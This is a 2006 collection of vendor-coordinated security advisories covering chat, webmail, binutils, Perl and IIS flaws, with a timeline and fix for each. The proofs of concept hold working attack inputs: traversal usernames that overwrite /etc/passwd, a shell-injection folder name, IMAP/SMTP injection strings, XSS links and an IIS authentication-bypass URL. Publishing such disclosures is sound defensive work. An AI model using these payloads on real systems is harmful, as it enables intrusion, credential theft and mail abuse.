Advisories 2006

2006-001: Arbitrary remote file creation in 123flashchat server.
2006-002: IMAP/SMTP Command Injection in SquirrelMail.
2006-003: Arbitrary flash code remote execution in 123flashchat.
2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.
2006-005: 'strings' command is vulnerable to a Denial of Service.
2006-006: SmbClientParser perl module allows remote command execution.
2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack.
2006-010: XSS vulnerability in error page of ISMail.
2006-011: IMAP/SMTP Injection in Hastymail.
2006-013: Microsoft IIS5 NTLM and Basic authentication bypass

2006-001: Arbitrary remote file creation in 123flashchat server.

Original release date: January 09, 2006
Last revised: January 13, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5

BACKGROUND

123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:

http://host10.123flaschat.com/123flaschat.swf

		http://www.123flashchat.com/123flashchat.swf

DESCRIPTION

The chat server has a user-register functionality, that can be enabled by the following sentence:

<enable-user-register>On</enable-user-register>

in /server/etc/groups/default.xml

By default it is enabled and anybody can create a chat account.

The register form ask the following questions:
username, password, repeat-password and email.

When a user creates an account, a file is created at members directory:

/123flashchat/server/data/default/members/isec-user

The user file has the following structure:

^@^B^@^<username>^@^V<password>^@^E<email>
or
^@^B^@^<username>^@^V<password>^@^@

                                                allow
field                          size       null     parse                               example
username              32          no       (allow transversal ../)     ../room_1.txt
password               32          no       allow all                           123
repeat-pass           32          no       allow all                           123
email                       128       yes      /^.+@.+\..+$/aa               a@b.c

Username field allow anybody to create a file in our system, with same priviledges as the server and almost arbitrary content.

This is dangerous becouse, a user can get others account, erase logs, modify the server's /etc/passwd or modify other config files.

PROOF OF CONCEPT

In the exploitation, there are two factors, WHERE and WHAT.
The username vector is WHERE, and WHAT can be:
1) password
2) email address if we need more bytes

Possible attacs:

../../../../logs/access.log               erase logs.
../../../../logs/error.log                    erase logs.
../default/logs/access.log           erase logs.
../members/parker                      change parker's password, if now we login with parker user, he will be disconected.
../../../../../../../etc/passwd              if server run as root.
../../../../etc/ssh/sshd.conf            if server run as root.
../../../../../var/log/messages        if server run as root.
../../../../var/www/htdocs/x.php     try to build a shell.
../../../etc/groups/default.xml       create an admin account by or other config settings.
../../../fcserver.sh                           try to replace the script.
etc...

It is possible to replace the existent files, to make a DoS, to erase logs, to create/change system accounts, to get other chat user/admin accounts or to make other effects in server's system.

*Possible* remote execution if some config file is modified.

Is it possible to hijack and modify the raw command, to inyect line feed (0x0a) or other characters to construct arbitrary content of the created/overwrited file.
Example:

<?xml version="1.0" encoding="UTF-8"?>
<Register email="" passwd="(0x0a)root::0:0:root:/bin/bash(0x0a)"
user="../../../../../../../etc/passwd" />(0x0a)

/etc/passwd will be:

\0\2\0\3../../../../../../../etc/passwd\0\3
root::0:0:root:/bin/bash
\0\0

If the server is Windows, is it possible to get execution.

BUSINESS IMPACT

The chat service can be crashed or compromissed remotelly.

SYSTEMS AFFECTED

This vulnerability affects the 123flaschat server up to 5.1 (released on Dec 22, 2005)

tested at:
123flaschat server 5.1
123flaschat server 5.0

SOLUTION

Upgrade to newer version.

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesús Olmos González (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

January 09, 2006: Initial release.
January 13, 2006: Vendor response actualization.

DISCLOSURE TIMELINE

January 04, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
January 09, 2006 Initial vendor notification sent.
January 10, 2006 Quick response, Version 5.1_2 was released.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-002: IMAP/SMTP Command Injection in SquirrelMail

Original release date: January 12, 2006
Last revised: February 27, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 4/5

BACKGROUND

SquirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.

DESCRIPTION

SquirrelMail provides a graphical interface to interact with mail servers across the IMAP and SMTP protocols.
Improper command and information validation transmitted by SquirrelMail to the mail servers during the normal use of this application (mailbox management, e-mail reading and sending, etc.) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by SquirrelMail across parameters used by the webmail front-ent in its communication with these mail servers.
This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and
exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.

PROOF OF CONCEPT

IMAP example
SquirrelMail Vulnerable parameter: "passed_id" (and possibly others)

When a user clicks in the subject of an e-mail, he creates a GET request as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0

A malicious user can modify the value of the "passed_id" parameter and inject any IMAP command.

Example:
Injection of the CAPABILITY IMAP command across the "passed_id" parameter:

http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=
1%20BODY[1]%0D%0AZ900%20CAPABILITY%0D%0AZ901%20CAPABILITY%0D%
0AZ902%20FETCH%201&startMessage=1&show_more=0

The page returned by the web server shows the result of the CAPABILITY command.

Example:

Z900 OK CAPABILITY completed
* CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES
SORT QUOTA ACL ACL2=UNION
Z901 OK CAPABILITY completed

SMTP example
SquirrelMail Vulnerable parameter: "subject" (and possibly others)

When a user send a message, he create a POST request like:

POST http://<victim>/src/compose.php HTTP/1.1 ...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and inject any SMTP command.

Example:
Relay from a non-existent e-mail address

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
. mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in SquirrelMail
. -----------------------------84060780712450133071594948441
...

BUSINESS IMPACT

The IMAP/SMTP command injection allow SPAM, relay, exploit IMAP and SMTP vulnerabilities in the mail servers and evade all the restrictions at the application layer.

SYSTEMS AFFECTED

IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).

SOLUTION

Replace \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15

REFERENCES

- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377

CREDITS

This vulnerability has been discovered and reported by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).

REVISION HISTORY

January 12, 2006: Initial release
January 20, 2006: Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated

DISCLOSURE TIMELINE

December, 2005 Vulnerability acquired by Vicente Aguilera Diaz (Internet Security Auditors)
January 12, 2006 Initial vendor notification sent.
January 19, 2006 The vulnerability is fixed in 1.4.6 cvs and 1.5.1 cvs.
February 15, 2006 The vendor published the vulnerability in the security section.
February 25, 2006 The CVE-2006-0377 is updated.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-003: Arbitrary flash code remote execution in 123flashchat.

Original release Date: January 12, 2006
Last revised: January 23, 2006
Discovered by: Jesus Olmos Gonzalez
Severity: 4/5

BACKGROUND

123 Flash Chat is a full featured java chat server and flash chat client, the product homepage is www.123flashchat.com and it is possible to test it at:

http://host10.123flaschat.com/123flaschat.swf
http://www.123flashchat.com/123flashchat.swf

DESCRIPTION

The flash chat client uses too much the eval sentence, in most of cases there is vulnerable becouse there is included variables in the eval, and users can change the value of them.

If we can write in a eval, we can inject code, if our user name has the character ; we could write code inside the client.

If its possible to write code, a cracker can convet his user to an admin by changing his variables. Is possible to inject to other
clients too.
 

let's see the vulnerable code:

function openOneAVWindow(username) {
var i = 0;
if (i < roomUsers.length) {
var user = roomUsers[i];
if (user.name == username)
{

if (eval("_root.avmc_" + user.name) == "")

if our username is:

x;user.name= a;user.name=ADMIN_AVATAR_NAME;//

the eval will be:

eval("_root.avmc_a;user.name=ADMIN_AVATAR_NAME;//");

and this will be executed when a window is opened:

user.name=ADMIN_AVATAR_NAME;

Is not possible a username with the " character, then is possible to use the ADMIN_AVATAR_NAME constat wich value is "admin".

PROOF OF CONCEPT

We have not exploited sucsessfuly, but there is the vulnerability.

BUSINESS IMPACT

-

SYSTEMS AFFECTED

This vulnerability affects the 123flaschat server up to 5.1
(released on Dec 22, 2005)

SOLUTION

No patch available yet.

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

January 13, 2006: Initial release.
Jaunary 23, 2006: Update the Vendor response.

DISCLOSURE TIMELINE

January 04, 2006 The vulnerability discovered by Internet Security Auditors.
January 13, 2006 Initial vendor notification sent.
January 23, 2006 Vendor confirm that this is corrected in v5.1_2 i

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-004: Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack.

Original release Date: April 18th, 2006
Last revised: November 13, 2007
Discovered by: Jesús Olmos González
Severity: 1/5

BACKGROUND

vtls.web.gateway cgi is a product from Visionary Technology in Library Solutions.

http://www.vtls.com

DESCRIPTION

Vtls.web.gateway cgi is vulnerable to a Cross Site Scripting attack. A malicious link could be used to steal user sessions.

PROOF OF CONCEPT

It is possible to execue html and javascript in the browser of who cliks in a link like this:

http://somevtlsweb.net/cgi-bin/vtls/vtls.web.gateway?authority=1&searcht...
%22%3E%3Ch1%3E%3Cmarquee%3EXSS%20bug%3C/marquee%3E%3C/h1%3E%3C!--&
kind=ns&conf=080104+++++++

BUSINESS IMPACT

-

SYSTEMS AFFECTED

All with this solution up to 48.1.0

SOLUTION

Update to Version 48.1.1

REFERENCES

www.vtls.com

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 18, 2006: Initial release.
November 13, 2007: Last revision.

DISCLOSURE TIMELINE

February 27, 2006: The vulnerability discovered by Internet Security Auditors.
April 18, 2006: Initial vendor notification sent. No response
April 26, 2006: Second vendor notification sent. Ping pong responses.
September 14, 2006: Third vendor notification sent. No response.
December 01, 2006: Fourth vendor notification sent. No response.
December 04, 2006: New patch coming. No schedule.
January 02, 2007: Fifth vendor contact to ask for planning. No response.
January 22, 2007: Sixth vendor contact to ask for planning. Scheduled.
March 23, 2007: Seventh vendor contact to ask for planning. Re-Scheduled.
May 22, 2007: Eigth vendor contact to ask for planning. Re-Scheduled.
October 01, 2007: Nineth vendor contact to ask for planning. Patch will be published in October.
November 09, 2007: Tenth. Version 48.1.1 has been approved for general release and published.
November 13, 2007: Advisory Published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-005: strings, dbg and other binutils commands are vulnerable to a Denial of Service.

Original release Date: April 16th, 2006
Last revised: April 26th, 2006
Discovered by: Jesús Olmos González
Severity: 2/5

BACKGROUND

strings and dbg are some of the tools from the binutils package, it could be used to look-for printable strings in a binary file, debug and reverse engineering of executables.

http://www.gnu.org/software/binutils/

DESCRIPTION

A binary file can be protected from the strings usage.

Is it possible to make a binary file with some special chars in a variable, that when is compiled is imposible to extract the printable strings of the elf, using the strings tool. It will segfault or hang-up.

(gdb) r evil
Starting program: /usr/bin/strings evil
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xb7e9ecbd in bfd_hash_lookup () from /usr/lib/libbfd-2.16.1.so
(gdb)

The problem is in bfd_hack_lookup from libbfd-2.16.1.so library, at this snippet of code:

1fcb1: c1 ef 02 shr $0x2,%edi
1fcb4: 31 c7 xor %eax,%edi
1fcb6: 89 f8 mov %edi,%eax
1fcb8: 8b 4d 08 mov 0x8(%ebp),%ecx
1fcbb: 31 d2 xor %edx,%edx
1fcbd: f7 71 04 divl 0x4(%ecx)
<--SIGSEGV with %253Cc%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA%AAAAA
1fcc0: 01 d2 add %edx,%edx
1fcc2: 01 d2 add %edx,%edx
1fcc4: 89 55 e0 mov %edx,0xffffffe0(%ebp)

with %253Cc ecx gets 0x54 value, and it cannot access to this address.
It seems there is not exploitable -but it is under investigation-.

All versions are affected.

PROOF OF CONCEPT

This evil file cannot be scanned with strings command:

root@jolmos:/research# strings evil
Violacion de segmento

root@jolmos:/research# cat evil

%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc%253Cc

root@jolmos:/research

BUSINESS IMPACT

-

SYSTEMS AFFECTED

Tested in some linux systems.

SOLUTION

There is a provisional patch at:
http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view

REFERENCES

-

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 18, 2006: Initial release.
April 26, 2006: The patch has been added at disclosure timeline.

DISCLOSURE TIMELINE

February 29, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com)
April 18, 2006 Initial vendor notification sent (http://sourceware.org/bugzilla/show_bug.cgi?id=2584)
April 23, 2006 A provisional path was published (http://sourceware.org/bugzilla/attachment.cgi?id=978&action=view)

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-006: SmbClientParser perl module allows remote command execution

Original release date: February 28, 2006
Last revised: July 18th, 2008
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5

BACKGROUND

SmbClientParser is a useful perl module to writing Netbios interactive codes, is a wraper from linux smbclient command and can be downloaded from:

http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7/SmbClientParser.pm

or installed:
perl -MCPAN -e shell
install Filesys::SmbClientParser

DESCRIPTION

If a host scans your shared folder whith a tool that uses this module, you can execute shell commands in his host.

This module has the following snippet of code:

my @var = `$pargs`;

pargs it is parsed with the following poor filters:

my $pargs;
if ($args=~/^([^;]*)$/) { # no ';' nickel
$pargs=$1;
} elsif ($smbscript) { # ';' is allowed inside -c ' '
if ($args=~/^([^;]* -c '[^']*'[^;]*)$/) {
$pargs=$1;
} else { # what that ?
die("Why a ';' here ? => $args");
}

} else { die("Why a ';' here ? => $args"); }

If thereis a folder inside a shared folder with the following name:

' x && xterm &#

The perl will spawn an xterm :)
Note that this was reported at 2006 and no answer received, be carefoul with cpan modules.

PROOF OF CONCEPT

This folder name inside the shared folder:

' x && xterm &#

Will execute the following:
/usr/bin/smbclient "//x.x.x.x/vulns" -U "user%pass" -d0 -c 'cd "' x && xterm &#"' -D "/poc"

This proof of concept spawns a xterm at vyctims xwindow, replace xterm for the evil commands.

BUSINESS IMPACT

-

SYSTEMS AFFECTED

Versions up to 2.7 included (all)

SOLUTION

Use this patch:

138a139,146
> #------------------------------------------------------------------------------
> # Sanitize (jolmos[@]isecauditors[.]com)
> #------------------------------------------------------------------------------
> sub Sanitize {
> my $danger = $_[0]; #There are many danger bytes, but if the
> $$danger =~ s/\n|\r|'|"|//ig; #danger string is inside "" or '' the only
> #option is break with ' or " or \r or \n
> }
265a274
> foreach my $i (@_) { &Sanitize(\$i); }
287a297
> foreach my $i (@_) { &Sanitize(\$i); }
321a332
> foreach my $i (@_) { &Sanitize(\$i); }
331a343
> foreach my $i (@_) { &Sanitize(\$i); }
345a358
> foreach my $i (@_) { &Sanitize(\$i); }
359a373
> foreach my $i (@_) { &Sanitize(\$i); }
373a388
> foreach my $i (@_) { &Sanitize(\$i); }
375a391
>
387a404
> foreach my $i (@_) { &Sanitize(\$i); }
398a416
> foreach my $i (@_) { &Sanitize(\$i); }
409a428
> foreach my $i (@_) { &Sanitize(\$i); }
487a507
> foreach my $i (@_) { &Sanitize(\$i); }

REFERENCES

http://search.cpan.org/~alian/Filesys-SmbClientParser-2.7

CREDITS

This vulnerability has been discovered and reported by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 26, 2006: Initial release.
July 14, 2008: Patch added.

DISCLOSURE TIMELINE

February 26, 2006: The vulnerability discovered by Internet Security Auditors.
April 26, 2006: Initial vendor notification sent.
September 14, 2006: Second notification: correction in one week. No correction.
December 2, 2006: Third notification: no response.
January 18, 2007: Forth notification: no response.
May 1, 2007: Fifth notification: no response.
November 11, 2007: Sixth notification: no response.
July 14, 2008: No response from the developer (Alain Barbet), we wrote the patch.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-007: The BlueSocket web administration is vulnerable to a Cross Site Scripting attack

Original release Date: April 27th, 2006
Last revised: December 1st, 2006
Discovered by: Jesús Olmos González
Severity: 2/5

BACKGROUND

BSC 2100 product is included in the Blue Secure Family (www.bluesocket.com).

BlueSecure Controllers provide high-performance, reliable, policy-based WLAN security and management solutions that have been deployed by hundreds of large institutions, enterprises, and public access providers.

DESCRIPTION

The admin.pl perl code don't sanitize the imputs and then wen it tries to rewrite the username at the input, html + script code could be rewrited and executed by the browser.

This crossite is in the administration of the security product, it has been tested only in BSC 2100.

Is it possible to send a fake email to the admin spoofing the product address, saying that the configuration is not ok and sending the special link.

If the admin press the link and validate in aparently normal interface, his credentials will be sended to the attacker.

If this is done with a good social engineering will be a great risk.

PROOF OF CONCEPT

This POC will inject some html to modify the look and feel of the authentication, and attacker could inject script code to send back the credentials:

https://host.domain.com/admin.pl?ad_name=%22%3E%3Ch1%3EXSS%20BUG%3C/h1%3...

BUSINESS IMPACT

Credentials could be stolen due social engineering attacks.

SYSTEMS AFFECTED

Versions prior 5.2 or without 5.1.1-BluePatch

SOLUTION

Update to 5.2 version or apply 5.1.1-BluePatch

REFERENCES

Vulnerability item number 4484 in the Bluepatch V6 for 5.1.1.1 Release Notes.

CREDITS

This vulnerability has been discovered and reported by
Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com).

REVISION HISTORY

April 27, 2006: Initial vendor contact.
April 28, 2006: Vendor updates its near patch.
June 21, 2006: Publication of the patch.
September 16, 2006: Vendor confirms inclusion in referenced patch.
September 17, 2006: Advisory revised.

DISCLOSURE TIMELINE

April 26, 2006: The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory finally Published

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-010: XSS vulnerability in error page of ISMail

Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5

BACKGROUND

ISMail is a webmail system. Programmed in HTML and PHP, it is designed to work with any imap server.

ISMail requires that PHP 4.2+, compiled with and IMAP and Session support, be installed on the server that runs it.

You have a choice of data-store backends (xml, encrypted xml, mysql, and postgresql are included, each requiring their respective PHP modules), and miscellaneous other options that can make the Inside Systems Mail experience a little friendlier.

Unlike most other webmail programs, Inside Systems Mail is both quick and easy to use. The layout, complete with address book and folder options, is simple and familiar to most users.

For administrators, the data-stores and options are easily extensible so that Inside Systems Mail can be dropped in nearly any configuration with minimal extra coding.

DESCRIPTION

The error page "error.php" receives a parameter facilitated in the querystring that shows the error message.

This parameter ("error") can be manipulated by an attacker to inject arbitrary script/HTML code.

This is dangerous because it's possible to realize XSS's attacks to obtain the session cookies of authenticated users and to spoof his session, or deface the error page.

PROOF OF CONCEPT

Example of XSS attack:

http://<webserver>/<path_to_ismail>/error.php \
?error=XSS%20attack%3Cscript%3Ealert(document.cookie);%3C/script%3E

BUSINESS IMPACT

An attacker can spoof the session of other authenticated users allowing to access to his mail, or deface the error page.

SYSTEMS AFFECTED

This vulnerability has been tested in the last version of ISMail (2.0, released on 2005-01-20).
Possibly all versions are affected by this vulnerability.

SOLUTION

Update version from the repository.

REFERENCES

http://www.insidesystems.net/projects/project.php?projectid=4

CREDITS

This vulnerability has been discovered and reported by
Vicente Aguilera Díaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

September 28, 2006: Initial release.

DISCLOSURE TIMELINE

September 27, 2006 The vulnerability discovered by Internet Security Auditors (www.isecauditors.com).
September 28, 2006 Initial vendor notification sent.
October 1, 2006 The vendor fixed the vulnerability in the repository.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-011: IMAP/SMTP Injection in Hastymail

Original release date: September 28, 2006
Last revised: December 1, 2006
Discovered by: Vicente Aguilera Díaz
Severity: 3/5

BACKGROUND

Hastymail is yet another webmail IMAP client written in PHP. Hastymail is designed for speed, RFC compatibility, simplicity, and security. Our goal is to create a simple interface with powerful but easy to use options that make managing your IMAP account effective and fast.

Hastymail is NOT groupware. We are focused on being a functional and fast webmail client.

The product homepage is http://hastymail.sourceforge.net/

DESCRIPTION

Hastymail provides a graphical interface to interact with mail servers across the IMAP/SMTP protocols.

Improper command and information validation transmitted by Hastymail to the mail servers during the normal use of this application (for example, acceding to the mailbox) facilitates that an authenticate malicious user could inject arbitrary IMAP/SMTP commands into the mail servers used by Hastymail across parameters used by the webmail front-end in its communication with these mail servers.

This is become dangerous because the injection of these commands allows an intruder to evade restrictions imposed at application level, and exploit vulnerabilities that could exist in the mail servers through IMAP/SMTP commands.

PROOF OF CONCEPT

== IMAP Injection example (1.5 version) =============

Hastymail Vulnerable parameter: "mailbox" (and possibly others)

When a user access to a folder (for example, "INBOX"), he creates a GET request as:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX

A malicious user can modify the value of the "mailbox" parameter and inject any IMAP command.

The IMAP command injection has the following structure:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20 \
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX

To observe that there has been in use double URL encoding for codifying the quote character (").

Example:

Injection of the CREATE IMAP command across the "mailbox" parameter:

http://<webserver>/<path_to_hastymail>/html/mailbox.php \
?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX \
%2522%0d%0aA0003%20CREATE%2522INBOX.vad

== SMTP Injection example (1.5 version) =============

Hastymail Vulnerable parameter: "subject" (and possibly others)

When a user send a message, he create a POST request like:

POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1
...

-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept

-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and inject any SMTP command.

Example: Relay from a non-existent e-mail address.

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"
Proof of Concept
.

mail from: hacker@domain.com
rcpt to: victim@otherdomain.com
data
This is a proof of concept of the SMTP command injection in Hastymail
.

-----------------------------84060780712450133071594948441
...

BUSINESS IMPACT

The IMAP/SMTP command injection allow to exploit vulnerabilities in the IMAP/SMTP servers and evade all the restrictions at the application layer.

SYSTEMS AFFECTED

This vulnerability has been tested in:

  • Last development version: 1.5, released on February 17, 2006
  • Last stable version: 1.0.2, August 23, 2004
  • Possibly all versions are affected by this vulnerability.

SOLUTION

Apply the patch: http://hastymail.sourceforge.net/security.php

REFERENCES

http://hastymail.sourceforge.net/security.php

CREDITS

This vulnerability has been discovered and reported by
Vicente Aguilera Diaz (vaguilera (at) isecauditors (dot) com).

REVISION HISTORY

September 28, 2006: Initial release.
October 3, 2006: Project admin response.
October 9, 2006: Project admin publish the patch for 1.5 and 1.02 versions.

DISCLOSURE TIMELINE

September 28, 2006: Vulnerability acquired by Internet Security Auditors (www.isecauditors.com).
December 1, 2006: Advisory published.

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.

Volver al inicio

2006-013: Microsoft IIS5 NTLM and Basic authentication bypass

Original release date: December 15, 2006
Last revised: May 22, 2007
Discovered by: Jesus Olmos Gonzalez
Severity: 5/5

BACKGROUND

Microsoft Internet Information Server Web Server can protect the private contents with a basic or NTLM authentication.

Many web pages, intranets and extranets rely on Microsoft security.

IISv5 has a "Hit-highlighting" functionality that opens some site object and highlights some part of it; that has had a transversal vulnerability in the past. Now it can be used to bypass the IIS authentication.

This is poorly documented at KnowledgeBase http://support.microsoft.com/kb/328832, the real impact is detailed above.

DESCRIPTION

Any Internet user can access the private web directories and files of any IISv5 web, by highlighting it with "Hit-highlighting". To use this functionality the user has to supply the CiWebhitsfile parameter to the null.htw object.

The null.htw object has to be accessed from a non-existant directory, for example http://anyiisweb.com/foo/null.htw

It is possible to use null.htw or other object specified at the CiTemplate template.

PROOF OF CONCEPT

https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/protectedfile.asp...
https://anyiis5.com/authBypass/null.htw?CiWebhitsfile=/some/secretfile.t...

BUSINESS IMPACT

The impact depends on the web contents. Attackers could gain access to all protected documents, and ASP code.
When an attacker accesses a trusted zone, the probability to get command execution is higher.

SYSTEMS AFFECTED

Internet Information Services Version 5, any Service Pack.

SOLUTION

Protect the files from the NTFS filesystem instead of relying on the IIS protection.
Microsoft recommends not to use IISv5.

REFERENCES

http://support.microsoft.com/kb/328832

CREDITS

This vulnerability has been discovered and reported
by Jesus Olmos Gonzalez (jolmos (at) isecauditors (dot) com)

REVISION HISTORY

December 15, 2006: Initial release
March 19, 2007: Latest revision
March 27, 2007: First notification to the vendor. Response: under revision.
April 11, 2007: The vendor considers little changes in their KB.
April 12, 2007: We accept it and propose add comments about the severity of the problem. Rejected.
May 21, 2007: Published. As the vendor information is not enough detailed.

DISCLOSURE TIMELINE

December 15, 2006: Vulnerability acquired by
Jesus Olmos Gonzalez (Internet Security Auditors)

LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors, S.L. accepts no responsibility for any damage caused by the use or misuse of this information.